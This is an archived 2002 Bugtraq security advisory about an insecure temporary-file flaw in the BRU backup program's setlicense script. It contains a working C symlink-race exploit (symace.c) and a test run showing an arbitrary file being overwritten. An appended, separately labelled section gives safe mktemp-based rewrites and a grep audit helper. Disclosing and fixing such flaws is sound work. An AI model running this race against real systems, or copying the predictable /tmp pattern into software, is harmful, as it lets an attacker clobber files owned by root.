7899872 2002-01-26 21:00 +1100  /116 lines/ Andrew Griffiths <andrewg@tasmail.com>
Sent by: joel@lysator.liu.se
Imported: 2002-01-28  19:50  by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <20701>
Subject: bru backup program
------------------------------------------------------------
From: "Andrew Griffiths" <andrewg@tasmail.com>
To: bugtraq@securityfocus.com
Message-ID: <200201261000.g0QA0sT13634@franklin.nt.tas.gov.au>

Product: Bru 

Description:
------------

BRU provides fully verified backup and restore operations and offers
options for most conceivable data backup and recovery needs. BRU
is fully device independent, so it works with any device or
filesystem that is supported by your operating system.
Verification is performed automatically with BRU's Autoscan feature
and can also be performed days, weeks, or even years after a
backup is performed.

[ As taken from bru.1 man page ]

Problem:
--------

The usage of insecure tmp files in some of the various shell scripts,
which allows you to overwrite arbitrary files with foobar. Since this
script would most likely be run by root, it allows you to overwrite
any files you want.

Exploit:
--------

This is the beginnings of the setlicense shell script. For those who
don't know, $$ is the current pid of the shell.

#!/bin/sh
printf "%s" foobar >/tmp/brutest.$$ 2>&1
res=`cat /tmp/brutest.$$`
rm -f /tmp/brutest.$$
if test "$res" != "foobar"; then
        alias printf="echo -n -e"
fi

So all that needs to be done is create a fair amount of symbolic
links in the temp directory pointing to the file you want to
overwrite.

---[ CUT ]---
/* symace.c -0.0.1 - A generic filesystem symlink/race thinger */

#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <stdio.h>

/* Please note that there is no error checking... */
/* By Andrew Griffiths (nullptr@tasmail.com)    */

int main(int argc, char **argv)
{
        char *overwrite;
        char *base;
        int start_pid, end_pid;
        int i, size;

        overwrite = strdup(argv[1]);
        size = strlen(argv[2]) + 8 + 1;
        base = malloc(size);
        start_pid=atoi(argv[3]);
        end_pid=atoi(argv[4]);

        for(i=start_pid;i<end_pid;i++) {
                memset(base, 0, size-1);
                snprintf(base, size-1, "%s%d", argv[2], i);
                if(symlink(overwrite, base)==-1) {
                        printf("Unable to create %s bailing\n", base);
                        exit(EXIT_FAILURE);
                }
        }
        printf("done\n");
        return 0;
}

Vendor Response:
----------------

This doesn't make much sense to me, exploiting your own system while
you are already root? Correct me if I am wrong but this doesn't make
much sense to me.

--Mike
BRU Support Team 
The TOLIS Group - http://www.tolisgroup.com 
support@tolisgroup.com 

I think he didn't like my example down there. Everyone else on the
list should be able to understand it without the need for a # sign...


Test Run:
---------

[andrewg@blackhole src]$ echo hello world > /tmp/hello
[andrewg@blackhole src]$ ./symace /tmp/hello /tmp/brutest. 12037 13000
done

On another terminal:

[andrewg@blackhole x86-linux-glibc2.1]$ ./setlicense
./setlicense: cd: /bru: No such file or directory
/bru does not exist.  BRU may not be installed.

Then back to the other one...

[andrewg@blackhole src]$ cat /tmp/hello
foobar[andrewg@blackhole src]$
--
www.tasmail.com
(7899872) /Andrew Griffiths <andrewg@tasmail.com>/(Rewrapped)
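Added here as an illustration of the fix, not part of Andrew Griffiths' post and not code from BRU or TOLIS: the printf probe from the start of setlicense rewritten in two ways that a planted symlink cannot redirect (no temp file at all, or a private mktemp directory), plus a small audit helper that flags the predictable /tmp/...$$ construct so every affected script can be found rather than only setlicense. It assumes a POSIX sh with mktemp(1); the function names and the SAMPLE_SCRIPT text are this example's own, the sample being a constructed excerpt of the lines quoted in the post.

```shell
#!/bin/sh
# Added example (not from the advisory or from BRU): safe alternatives to the
# predictable "/tmp/brutest.$$" probe, plus an audit helper for the pattern.
# Assumes a POSIX sh and mktemp(1); TMPDIR is honoured when set.

# Best fix: the probe does not need a file at all. Capturing printf's output
# in a variable removes the temp file, and with it the symlink race.
probe_printf_nofile() {
    res=$(printf "%s" foobar 2>/dev/null) || return 1
    [ "$res" = "foobar" ]
}

# When a scratch file is genuinely required: create a private directory with
# an unpredictable name (mktemp -d creates it mode 0700 and fails rather than
# reusing an existing path), then write only inside that directory. A symlink
# planted at a guessable /tmp name is never opened.
probe_printf_tmpdir() {
    dir=$(mktemp -d "${TMPDIR:-/tmp}/brutest.XXXXXX") || return 1
    # Defensive check: mktemp handed us a real directory, not a link.
    if [ -L "$dir" ] || [ ! -d "$dir" ]; then
        return 1
    fi
    printf "%s" foobar >"$dir/probe" 2>&1
    res=$(cat "$dir/probe")
    rm -rf "$dir"
    [ "$res" = "foobar" ]
}

# Audit helper: list lines that build a /tmp path from $$ (the construct the
# advisory describes). Prints "line:text" per hit; exit status 1 when none.
find_predictable_tmp() {
    grep -nE '/tmp/[^[:space:]]*\$\$' "$1"
}

# Constructed sample: the opening lines of setlicense as quoted in the post.
SAMPLE_SCRIPT='printf "%s" foobar >/tmp/brutest.$$ 2>&1
res=`cat /tmp/brutest.$$`
rm -f /tmp/brutest.$$'

# Stand-alone run: audit the sample, then exercise both safe probes.
sample=$(mktemp "${TMPDIR:-/tmp}/audit.XXXXXX") || exit 1
printf '%s\n' "$SAMPLE_SCRIPT" >"$sample"
find_predictable_tmp "$sample"
rm -f "$sample"
probe_printf_nofile && echo "no-file probe: ok"
probe_printf_tmpdir && echo "tmpdir probe: ok"
```

The first probe is the one to prefer: the script only wants to know whether printf works, so there is nothing to write to disk. The directory variant matters for scripts that really do need a scratch file; the directory, not the file, is what mktemp protects, so a name chosen by someone else under /tmp is never followed. Running the audit over a package's script directory (for example with a shell loop over *.sh) lists every line that still uses the $$ construct.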